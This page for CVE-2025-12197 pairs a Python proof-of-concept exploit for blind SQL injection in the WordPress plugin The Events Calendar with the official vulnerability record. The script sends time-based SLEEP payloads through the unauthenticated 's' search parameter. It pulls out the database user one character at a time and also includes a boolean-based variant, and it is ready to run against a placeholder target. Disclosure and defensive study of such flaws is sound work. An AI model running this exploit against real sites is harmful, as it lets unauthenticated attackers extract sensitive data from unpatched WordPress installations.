CVE-2025-12197

# CVE-2025-12197 PoC - The Events Calendar SQL Injection # Target: WordPress with The Events Calendar plugin (versions 6.15.1.1 - 6.15.9) # Vulnerability: Blind SQL Injection via 's' parameter import requests import time target_url = "http://target-site.com/" # SQL Injection payload for time-based blind extraction # Extracts database user (example: checking if first char is 'a') def exploit_blind_sql(payload): params = { 's': payload } start_time = time.time() response = requests.get(target_url, params=params, timeout=30) elapsed = time.time() - start_time return elapsed > 5 # True if SLEEP(5) was executed # Example payload to extract database user # Using SUBSTRING and ASCII comparison for blind extraction payload_template = "' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user()),{},1))={}) THEN SLEEP(5) ELSE 0 END) AND '1'='1" def extract_data(): extracted = "" charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_." for pos in range(1, 50): # Max length check for char in charset: payload = payload_template.format(pos, ord(char)) if exploit_blind_sql(payload): extracted += char print(f"Extracted: {extracted}") break else: break return extracted # Boolean-based injection alternative def exploit_boolean_sql(injection): params = { 's': f"' AND {injection} AND '1'='1" } response = requests.get(target_url, params=params) return len(response.text) > 0 # Adjust based on target behavior if __name__ == "__main__": print("CVE-2025-12197 - The Events Calendar SQL Injection PoC") print("Target:", target_url) print("Starting blind SQL injection attack...")

{"cve": {"id": "CVE-2025-12197", "sourceIdentifier": "[email protected]", "published": "2025-11-05T05:15:51.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Events Calendar plugin for WordPress is vulnerable to blind SQL Injection via the 's' parameter in versions 6.15.1.1 to 6.15.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3386042/the-events-calendar", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc927a93-0cb2-4211-9f93-c0671039011e?source=cve", "source": "[email protected]"}]}}